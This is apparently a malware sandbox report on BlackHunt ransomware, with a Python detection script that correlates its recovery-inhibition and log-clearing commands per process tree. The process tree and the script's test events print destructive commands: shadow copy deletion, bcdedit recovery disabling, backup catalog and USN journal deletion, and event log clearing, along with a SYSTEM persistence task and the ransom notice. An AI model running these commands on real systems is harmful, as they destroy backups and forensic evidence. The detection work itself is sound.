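From the shadow-storage resizes down to the last `wevtutil cl`, this is the standard inhibit-recovery and wipe-the-trail sequence, and together with the `SCHTASKS /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart` persistence earlier in the tree it is what a process-creation detection should correlate rather than match one line at a time: a lone `vssadmin resize shadowstorage` or `wevtutil cl Application` is routine admin work, many distinct techniques under one parent inside a minute is not. Two details are worth keeping. The unbounded/401MB resize pair purges existing shadow copies on its own, because VSS discards copies that no longer fit the new limit, so a rule keyed only on `Delete Shadows` misses a sample that stops there. And `/e:false` is the `wevtutil sl` switch for disabling a log, which `wevtutil cl` does not accept, yet a rule keyed on `wevtutil cl` still matches it, as the sandbox's own signature did. The script below runs both checks over constructed events; it is an added example, not part of the tria.ge report or of the sample. The command lines are copied from this page, while the timestamps, the root PID 1234, the `sample.exe` file name and the two benign admin events are made up, and only two events keep the `cmd.exe /c` wrapper that the real tree puts between the sample and every tool.

```python
"""Score process-creation events for the recovery-inhibition and log-clearing
chain in the process tree above, correlated per process tree.

Added example, not part of the tria.ge report. EVENTS is constructed: the
command lines are copied from this page; the timestamps (seconds), the root
PID 1234, the `sample.exe` name and the two benign admin events are made up.
"""
import re
from collections import defaultdict

# (technique, regex over the lower-cased command line). `cmd.exe /c ...`
# wrappers match as well as the child; the per-tree set dedupes them.
RULES = [
    ("shadow-resize", re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage\b.*\bmaxsize=")),
    ("shadow-delete", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\b")),
    ("boot-recovery-off", re.compile(r"bcdedit(\.exe)?\s+/set\b.*\brecoveryenabled\s+no\b")),
    ("boot-ignore-failures", re.compile(r"bcdedit(\.exe)?\s+/set\b.*\bbootstatuspolicy\s+ignoreallfailures\b")),
    ("backup-catalog-delete", re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog\b")),
    ("usn-journal-delete", re.compile(r"fsutil(\.exe)?\s+usn\s+deletejournal\b")),
    ("system-restore-task-off", re.compile(r"schtasks(\.exe)?\s+/change\b.*systemrestore\\sr\b.*/disable")),
    ("eventlog-clear", re.compile(r"wevtutil(\.exe)?\s+cl\s+\S+")),
    ("system-task-onstart", re.compile(r'schtasks(\.exe)?\s+/create\b.*/ru\s+"?nt authority\\system"?.*/sc\s+onstart')),
]
_RESIZE = re.compile(r"resize\s+shadowstorage\s+/for=([a-z]):.*?/maxsize=(\S+)")

def classify(cmdline):
    """Techniques a single command line matches."""
    low = cmdline.lower()
    return [name for name, rx in RULES if rx.search(low)]

def root_of(pid, parents):
    """Walk pid -> ppid up to the topmost process we hold an event for."""
    for _ in range(64):  # bounded, PID reuse can create cycles in real logs
        if pid in parents and parents[pid] in parents:
            pid = parents[pid]
        else:
            break
    return pid

def correlate(events, window=300, threshold=3):
    """{root pid: sorted techniques} for trees showing at least `threshold`
    distinct techniques inside `window` seconds. One vssadmin or wevtutil run
    by an admin stays below threshold; the sample above trips it in seconds."""
    parents = {e["pid"]: e["ppid"] for e in events}
    hits = defaultdict(list)
    for e in events:
        for tech in classify(e["cmd"]):
            hits[root_of(e["pid"], parents)].append((e["t"], tech))
    alerts = {}
    for root, seen in hits.items():
        seen.sort()
        for t0, _ in seen:
            techs = {tech for t, tech in seen if t0 <= t <= t0 + window}
            if len(techs) >= threshold:
                alerts[root] = sorted(techs)
                break
    return alerts

def shadow_resize_pairs(events, window=60):
    """(root pid, volume) where shadow storage was resized to two different
    limits within `window` seconds. Shrinking the limit below what the existing
    shadow copies occupy makes VSS discard them, so the unbounded/401MB pair
    above deletes copies without ever running `delete shadows`."""
    parents = {e["pid"]: e["ppid"] for e in events}
    seen = defaultdict(list)
    for e in events:
        m = _RESIZE.search(e["cmd"].lower())
        if m:
            seen[(root_of(e["pid"], parents), m.group(1))].append((e["t"], m.group(2)))
    return [key for key, resizes in seen.items()
            if any(0 < t1 - t0 <= window and s0 != s1
                   for t0, s0 in resizes for t1, s1 in resizes)]

EVENTS = [  # constructed, see the module docstring
    {"t": 0, "pid": 1234, "ppid": 900, "cmd": r"C:\Users\Admin\AppData\Local\Temp\sample.exe"},
    {"t": 5, "pid": 2904, "ppid": 1234, "cmd": r'SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\sample.exe" /F'},
    {"t": 20, "pid": 3768, "ppid": 1234, "cmd": r'"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded'},
    {"t": 20, "pid": 1820, "ppid": 3768, "cmd": r"vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded"},
    {"t": 22, "pid": 4444, "ppid": 1234, "cmd": r"vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB"},
    {"t": 30, "pid": 4548, "ppid": 1234, "cmd": "vssadmin.exe Delete Shadows /all /quiet"},
    {"t": 31, "pid": 6140, "ppid": 1234, "cmd": "bcdedit /set {default} recoveryenabled No"},
    {"t": 32, "pid": 548, "ppid": 1234, "cmd": "bcdedit /set {default} bootstatuspolicy IgnoreAllFailures"},
    {"t": 33, "pid": 3064, "ppid": 1234, "cmd": "fsutil.exe usn deletejournal /D C:"},
    {"t": 34, "pid": 5400, "ppid": 1234, "cmd": r'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable'},
    {"t": 35, "pid": 5372, "ppid": 1234, "cmd": "wbadmin.exe delete catalog -quiet"},
    {"t": 40, "pid": 816, "ppid": 1234, "cmd": "wevtutil.exe cl Security"},
    {"t": 41, "pid": 3208, "ppid": 1234, "cmd": "wevtutil.exe cl Security /e:false"},
    # unrelated admin work in another process tree: must stay quiet
    {"t": 25, "pid": 777, "ppid": 1, "cmd": "vssadmin list shadows"},
    {"t": 50, "pid": 778, "ppid": 1, "cmd": "wevtutil.exe cl Application"},
]

if __name__ == "__main__":
    print(correlate(EVENTS))
    print(shadow_resize_pairs(EVENTS))
```

On real telemetry the `t`, `pid`, `ppid` and `cmd` fields map straight onto UtcTime, ProcessId, ParentProcessId and CommandLine of Sysmon event 1; the correlation keys on the topmost ancestor you have an event for, so the alert names the sample, not the twenty cmd.exe wrappers under it.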
  C:\Windows\System32\cmd.exe  (depth 2, PID 3844)
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 3668)
      vssadmin.exe Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 5800)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    C:\Windows\system32\bcdedit.exe  (depth 3, PID 4208)
      bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe  (depth 2, PID 6104)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    C:\Windows\system32\bcdedit.exe  (depth 3, PID 3728)
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe  (depth 2, PID 1312)
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    C:\Windows\system32\fsutil.exe  (depth 3, PID 2752)
      fsutil.exe usn deletejournal /D C:
      - Deletes NTFS Change Journal
  C:\Windows\System32\cmd.exe  (depth 2, PID 3504)
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    C:\Windows\system32\wbadmin.exe  (depth 3, PID 3692)
      wbadmin.exe delete catalog -quiet
      - Deletes backup catalog
  C:\Windows\System32\cmd.exe  (depth 2, PID 4204)
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    C:\Windows\system32\schtasks.exe  (depth 3, PID 5724)
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  C:\Windows\System32\cmd.exe  (depth 2, PID 5808)
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    C:\Windows\system32\reg.exe  (depth 3, PID 4336)
      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  C:\Windows\System32\cmd.exe  (depth 2, PID 5816)
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    C:\Windows\system32\reg.exe  (depth 3, PID 4904)
      REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  C:\Windows\System32\cmd.exe  (depth 2, PID 5776)
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    C:\Windows\system32\schtasks.exe  (depth 3, PID 4980)
      SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  C:\Windows\System32\cmd.exe  (depth 2, PID 4552)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe  (depth 3, PID 1188)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  C:\Windows\System32\cmd.exe  (depth 2, PID 3568)
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe  (depth 3, PID 3156)
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\system32\vssvc.exe  (depth 1, PID 4856)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbengine.exe  (depth 1, PID 6112)
  "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\vdsldr.exe  (depth 1, PID 5304)
  C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe  (depth 1, PID 6132)
  C:\Windows\System32\vds.exe
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (2): Disable or Modify Tools (2)
- Indicator Removal (4): File Deletion (3)
- Modify Registry (5)
Downloads
- Filesize 1KB
  MD5    e2a8ebd58e67e3a76e145f1c634643d4
  SHA1   4041a6acb4fe4f450504df790977d795f62cc2a1
  SHA256 2353f4d509e250b26c5797a2fc2e292ee68ef170fd304bc8b5d938f006b43de4
  SHA512 4a96bf01bd15a30a7803268f5f08ea4718349e1845f11ff9725d34087f2415f41a7db5b15b1e7f5c017ddd78aaa1cc74081ed86eb376fbb5c4a3c49eeaa81750
- Filesize 684B
  MD5    d9884015db4203a8f477abeed87a53cf
  SHA1   de52aa0265b66b14af8440af7f1b48a0dbca6539
  SHA256 c33a9f8ea66ede69be136f170817f4d8926fc63445ea200769358a3c6de8b0af
  SHA512 4f8b489ed6e3891479241e16cc9728037db001170ceedf7c5419357d77cea7dfde93f0d484a8fc4e5db7a00dc6e34e6c856b06028ae5daba738f8fe9678f1418
- Filesize 12KB
  MD5    cfc308bf15b5288285f507af78c6d8d1
  SHA1   a261c26a3ea5824167ffe40d70ce239b40a3149f
  SHA256 f454e612544b63d0d65131788e26246c275f73a92e9642290595cc517ea16c27
  SHA512 a485269141ae07a212ee225fdd84acabd189f33ee37bfa1dd8ab3133342fe586f42d8586df19f8ad9c99893b0fdcfc347f05d9ac9ac4ccb80765096ba74ba4f7